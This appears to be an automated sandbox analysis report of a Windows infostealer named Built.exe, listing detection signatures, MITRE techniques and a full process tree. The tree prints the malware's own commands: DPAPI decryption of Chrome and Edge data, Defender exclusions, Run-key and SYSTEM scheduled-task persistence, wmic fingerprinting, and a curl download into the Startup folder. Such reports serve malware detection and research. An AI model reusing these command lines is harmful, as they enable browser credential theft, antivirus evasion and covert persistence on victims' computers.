8d7299e5a8afb21de858dab6034de69287bc6fabbd2c61ab38e7941fae4ee118

Resubmissions

10-07-2024 16:21

240710-tt4g1sxemn 8

10-07-2024 16:21

240710-ttm52azejb 8

Analysis

max time kernel
16s
max time network
35s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
10-07-2024 16:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

47.0MB
MD5

0335d9e2a35d3c01f450a6a5aed16a1d
SHA1

e87d6daf1a77258a01e2cce3fe13e060579965bc
SHA256

8d7299e5a8afb21de858dab6034de69287bc6fabbd2c61ab38e7941fae4ee118
SHA512

026f7670bdeb06bd2678e71860a530a1eb2db26cafb96f1873307a01ca39cda52617a7fdd1c920ac681634f99505ea67ec635e34fda342adc0950e4a3370b2b4
SSDEEP

786432:R3on1HvSzxAMNOFZArYsbPv0p7OZYuZpuxa5VJQnlDNoS:RYn1HvSpNOXmbuWbuxOVJQtNh

Score

8^/10

defense_evasion execution persistence spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
11	3516	curl.exe
13	3428	curl.exe
18	1124	curl.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
924	powershell.exe
2516	powershell.exe
2000	powershell.exe
4176	powershell.exe
4660	powershell.exe

Loads dropped DLL 1 IoCs

pid	Process
900	Built.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\mytcPnqBfzwMxUF.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Built.exe"	reg.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
3040	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	discord.com
6	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
2440	cmd.exe
4840	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 20 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1148	WMIC.exe
3472	WMIC.exe
5024	WMIC.exe
2824	WMIC.exe
4632	WMIC.exe
4388	WMIC.exe
4820	WMIC.exe
4472	WMIC.exe
1772	WMIC.exe
3700	WMIC.exe
1772	WMIC.exe
1256	WMIC.exe
4032	WMIC.exe
2132	WMIC.exe
3396	WMIC.exe
3132	WMIC.exe
400	WMIC.exe
1836	WMIC.exe
4168	WMIC.exe
3028	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
2132	tasklist.exe
3020	tasklist.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
3412	reg.exe
3408	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3820	schtasks.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
924	powershell.exe
924	powershell.exe
2968	powershell.exe
2968	powershell.exe
4336	powershell.exe
4336	powershell.exe
4660	powershell.exe
4660	powershell.exe
4176	powershell.exe
4176	powershell.exe
3156	powershell.exe
3156	powershell.exe
2000	powershell.exe
2000	powershell.exe
1836	powershell.exe
1836	powershell.exe
1420	powershell.exe
1420	powershell.exe
2516	powershell.exe
2516	powershell.exe
2000	powershell.exe
2000	powershell.exe
864	powershell.exe
864	powershell.exe
1420	powershell.exe
1420	powershell.exe
2932	powershell.exe
2932	powershell.exe
1196	powershell.exe
1196	powershell.exe
1200	powershell.exe
1200	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	924	powershell.exe
Token: SeDebugPrivilege	2132	tasklist.exe
Token: SeDebugPrivilege	3020	tasklist.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeIncreaseQuotaPrivilege	3536	WMIC.exe
Token: SeSecurityPrivilege	3536	WMIC.exe
Token: SeTakeOwnershipPrivilege	3536	WMIC.exe
Token: SeLoadDriverPrivilege	3536	WMIC.exe
Token: SeSystemProfilePrivilege	3536	WMIC.exe
Token: SeSystemtimePrivilege	3536	WMIC.exe
Token: SeProfSingleProcessPrivilege	3536	WMIC.exe
Token: SeIncBasePriorityPrivilege	3536	WMIC.exe
Token: SeCreatePagefilePrivilege	3536	WMIC.exe
Token: SeBackupPrivilege	3536	WMIC.exe
Token: SeRestorePrivilege	3536	WMIC.exe
Token: SeShutdownPrivilege	3536	WMIC.exe
Token: SeDebugPrivilege	3536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3536	WMIC.exe
Token: SeRemoteShutdownPrivilege	3536	WMIC.exe
Token: SeUndockPrivilege	3536	WMIC.exe
Token: SeManageVolumePrivilege	3536	WMIC.exe
Token: 33	3536	WMIC.exe
Token: 34	3536	WMIC.exe
Token: 35	3536	WMIC.exe
Token: 36	3536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3244	WMIC.exe
Token: SeSecurityPrivilege	3244	WMIC.exe
Token: SeTakeOwnershipPrivilege	3244	WMIC.exe
Token: SeLoadDriverPrivilege	3244	WMIC.exe
Token: SeSystemProfilePrivilege	3244	WMIC.exe
Token: SeSystemtimePrivilege	3244	WMIC.exe
Token: SeProfSingleProcessPrivilege	3244	WMIC.exe
Token: SeIncBasePriorityPrivilege	3244	WMIC.exe
Token: SeCreatePagefilePrivilege	3244	WMIC.exe
Token: SeBackupPrivilege	3244	WMIC.exe
Token: SeRestorePrivilege	3244	WMIC.exe
Token: SeShutdownPrivilege	3244	WMIC.exe
Token: SeDebugPrivilege	3244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3244	WMIC.exe
Token: SeRemoteShutdownPrivilege	3244	WMIC.exe
Token: SeUndockPrivilege	3244	WMIC.exe
Token: SeManageVolumePrivilege	3244	WMIC.exe
Token: 33	3244	WMIC.exe
Token: 34	3244	WMIC.exe
Token: 35	3244	WMIC.exe
Token: 36	3244	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3536	WMIC.exe
Token: SeSecurityPrivilege	3536	WMIC.exe
Token: SeTakeOwnershipPrivilege	3536	WMIC.exe
Token: SeLoadDriverPrivilege	3536	WMIC.exe
Token: SeSystemProfilePrivilege	3536	WMIC.exe
Token: SeSystemtimePrivilege	3536	WMIC.exe
Token: SeProfSingleProcessPrivilege	3536	WMIC.exe
Token: SeIncBasePriorityPrivilege	3536	WMIC.exe
Token: SeCreatePagefilePrivilege	3536	WMIC.exe
Token: SeBackupPrivilege	3536	WMIC.exe
Token: SeRestorePrivilege	3536	WMIC.exe
Token: SeShutdownPrivilege	3536	WMIC.exe
Token: SeDebugPrivilege	3536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3536	WMIC.exe
Token: SeRemoteShutdownPrivilege	3536	WMIC.exe
Token: SeUndockPrivilege	3536	WMIC.exe
Token: SeManageVolumePrivilege	3536	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 900 wrote to memory of 772	900	Built.exe	82
PID 900 wrote to memory of 772	900	Built.exe	82
PID 772 wrote to memory of 4544	772	cmd.exe	83
PID 772 wrote to memory of 4544	772	cmd.exe	83
PID 772 wrote to memory of 924	772	cmd.exe	84
PID 772 wrote to memory of 924	772	cmd.exe	84
PID 924 wrote to memory of 2980	924	powershell.exe	85
PID 924 wrote to memory of 2980	924	powershell.exe	85
PID 2980 wrote to memory of 1228	2980	csc.exe	86
PID 2980 wrote to memory of 1228	2980	csc.exe	86
PID 900 wrote to memory of 3896	900	Built.exe	87
PID 900 wrote to memory of 3896	900	Built.exe	87
PID 3896 wrote to memory of 1580	3896	cmd.exe	88
PID 3896 wrote to memory of 1580	3896	cmd.exe	88
PID 900 wrote to memory of 3268	900	Built.exe	89
PID 900 wrote to memory of 3268	900	Built.exe	89
PID 3268 wrote to memory of 2132	3268	cmd.exe	90
PID 3268 wrote to memory of 2132	3268	cmd.exe	90
PID 900 wrote to memory of 4264	900	Built.exe	92
PID 900 wrote to memory of 4264	900	Built.exe	92
PID 900 wrote to memory of 2440	900	Built.exe	93
PID 900 wrote to memory of 2440	900	Built.exe	93
PID 4264 wrote to memory of 3020	4264	cmd.exe	95
PID 4264 wrote to memory of 3020	4264	cmd.exe	95
PID 2440 wrote to memory of 2968	2440	cmd.exe	94
PID 2440 wrote to memory of 2968	2440	cmd.exe	94
PID 900 wrote to memory of 4840	900	Built.exe	137
PID 900 wrote to memory of 4840	900	Built.exe	137
PID 4840 wrote to memory of 4336	4840	cmd.exe	97
PID 4840 wrote to memory of 4336	4840	cmd.exe	97
PID 900 wrote to memory of 3884	900	Built.exe	98
PID 900 wrote to memory of 3884	900	Built.exe	98
PID 900 wrote to memory of 916	900	Built.exe	143
PID 900 wrote to memory of 916	900	Built.exe	143
PID 900 wrote to memory of 756	900	Built.exe	100
PID 900 wrote to memory of 756	900	Built.exe	100
PID 3884 wrote to memory of 3536	3884	cmd.exe	101
PID 3884 wrote to memory of 3536	3884	cmd.exe	101
PID 916 wrote to memory of 4844	916	cmd.exe	142
PID 916 wrote to memory of 4844	916	cmd.exe	142
PID 900 wrote to memory of 3040	900	Built.exe	103
PID 900 wrote to memory of 3040	900	Built.exe	103
PID 900 wrote to memory of 3360	900	Built.exe	149
PID 900 wrote to memory of 3360	900	Built.exe	149
PID 756 wrote to memory of 3820	756	cmd.exe	105
PID 756 wrote to memory of 3820	756	cmd.exe	105
PID 3040 wrote to memory of 4660	3040	cmd.exe	106
PID 3040 wrote to memory of 4660	3040	cmd.exe	106
PID 3360 wrote to memory of 3244	3360	cmd.exe	107
PID 3360 wrote to memory of 3244	3360	cmd.exe	107
PID 900 wrote to memory of 4604	900	Built.exe	108
PID 900 wrote to memory of 4604	900	Built.exe	108
PID 4604 wrote to memory of 4540	4604	cmd.exe	109
PID 4604 wrote to memory of 4540	4604	cmd.exe	109
PID 900 wrote to memory of 4820	900	Built.exe	110
PID 900 wrote to memory of 4820	900	Built.exe	110
PID 4820 wrote to memory of 3104	4820	cmd.exe	111
PID 4820 wrote to memory of 3104	4820	cmd.exe	111
PID 900 wrote to memory of 1948	900	Built.exe	112
PID 900 wrote to memory of 1948	900	Built.exe	112
PID 1948 wrote to memory of 3516	1948	cmd.exe	153
PID 1948 wrote to memory of 3516	1948	cmd.exe	153
PID 1948 wrote to memory of 684	1948	cmd.exe	114
PID 1948 wrote to memory of 684	1948	cmd.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:4544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:924
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xwxvyger\xwxvyger.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2980
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB94D.tmp" "c:\Users\Admin\AppData\Local\Temp\xwxvyger\CSCB4201A13B28432ABDEB1AC3E9D25B17.TMP"
        5⤵
        
        PID:1228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3896
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3268
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4264
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,88,89,96,11,224,211,76,190,70,119,25,81,173,58,14,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,8,213,60,249,47,127,193,115,119,0,202,119,76,118,156,114,21,103,255,44,134,189,148,73,249,235,103,204,181,14,187,76,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,188,180,127,225,148,126,43,70,100,44,5,48,229,29,251,32,42,95,193,8,239,110,65,27,136,233,145,149,108,56,188,157,48,0,0,0,194,118,49,160,57,217,204,74,77,175,197,163,41,218,253,156,77,39,174,89,136,150,121,0,165,74,203,242,61,228,172,235,190,16,255,151,176,123,56,13,89,81,41,32,254,42,204,237,64,0,0,0,34,228,87,212,149,252,253,117,153,178,2,145,43,63,97,93,236,48,60,222,129,53,139,240,3,19,28,242,41,192,25,94,219,191,2,66,46,93,91,46,20,105,168,134,150,108,245,202,108,81,24,197,218,183,83,125,202,20,79,254,61,170,67,98), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,88,89,96,11,224,211,76,190,70,119,25,81,173,58,14,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,8,213,60,249,47,127,193,115,119,0,202,119,76,118,156,114,21,103,255,44,134,189,148,73,249,235,103,204,181,14,187,76,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,188,180,127,225,148,126,43,70,100,44,5,48,229,29,251,32,42,95,193,8,239,110,65,27,136,233,145,149,108,56,188,157,48,0,0,0,194,118,49,160,57,217,204,74,77,175,197,163,41,218,253,156,77,39,174,89,136,150,121,0,165,74,203,242,61,228,172,235,190,16,255,151,176,123,56,13,89,81,41,32,254,42,204,237,64,0,0,0,34,228,87,212,149,252,253,117,153,178,2,145,43,63,97,93,236,48,60,222,129,53,139,240,3,19,28,242,41,192,25,94,219,191,2,66,46,93,91,46,20,105,168,134,150,108,245,202,108,81,24,197,218,183,83,125,202,20,79,254,61,170,67,98), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,88,89,96,11,224,211,76,190,70,119,25,81,173,58,14,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,213,44,193,107,20,212,61,252,27,197,109,122,198,189,171,30,202,155,198,90,144,176,167,243,171,28,79,84,129,180,150,12,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,118,164,117,22,70,162,90,226,66,31,84,207,174,211,29,110,88,102,204,116,113,103,222,51,63,107,35,11,84,236,82,136,48,0,0,0,216,2,197,233,18,59,0,246,231,253,157,240,72,33,198,16,143,180,78,22,24,89,80,228,25,57,127,48,147,236,178,175,82,73,185,27,7,191,195,132,196,162,222,241,76,97,148,34,64,0,0,0,149,120,154,30,97,236,5,116,112,117,56,107,130,29,249,159,85,84,145,18,8,105,144,50,171,122,40,36,49,155,244,86,149,158,85,40,118,169,216,31,40,113,70,232,181,44,155,85,92,148,35,177,121,90,140,41,108,144,20,238,63,222,255,112), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,88,89,96,11,224,211,76,190,70,119,25,81,173,58,14,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,213,44,193,107,20,212,61,252,27,197,109,122,198,189,171,30,202,155,198,90,144,176,167,243,171,28,79,84,129,180,150,12,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,118,164,117,22,70,162,90,226,66,31,84,207,174,211,29,110,88,102,204,116,113,103,222,51,63,107,35,11,84,236,82,136,48,0,0,0,216,2,197,233,18,59,0,246,231,253,157,240,72,33,198,16,143,180,78,22,24,89,80,228,25,57,127,48,147,236,178,175,82,73,185,27,7,191,195,132,196,162,222,241,76,97,148,34,64,0,0,0,149,120,154,30,97,236,5,116,112,117,56,107,130,29,249,159,85,84,145,18,8,105,144,50,171,122,40,36,49,155,244,86,149,158,85,40,118,169,216,31,40,113,70,232,181,44,155,85,92,148,35,177,121,90,140,41,108,144,20,238,63,222,255,112), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:916
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:756
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:3040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    PID:4660
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dd32fube\dd32fube.cmdline"
      4⤵
      PID:3028
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4E6.tmp" "c:\Users\Admin\AppData\Local\Temp\dd32fube\CSC252580AF21234BAEBE05E7475E5B972.TMP"
        5⤵
        
        PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4604
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    PID:4540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:4348
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4176
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2000
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Built.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:3412
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:3408
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:3360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:3104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3516
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:4408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:3548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:1584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:4008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:3424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1684
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:4840
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:3172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4844
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2168
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:3516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
